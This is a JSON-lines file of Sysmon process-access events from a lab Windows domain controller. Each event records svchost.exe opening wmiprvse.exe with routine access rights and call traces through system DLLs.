{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1087,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.159\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.159","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1088,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.159\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.159","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1089,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.159\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.159","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1090,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.159\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.159","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1091,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.159\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.159","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1092,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.159\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.159","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1093,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.159\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.159","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1094,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.159\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.159","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
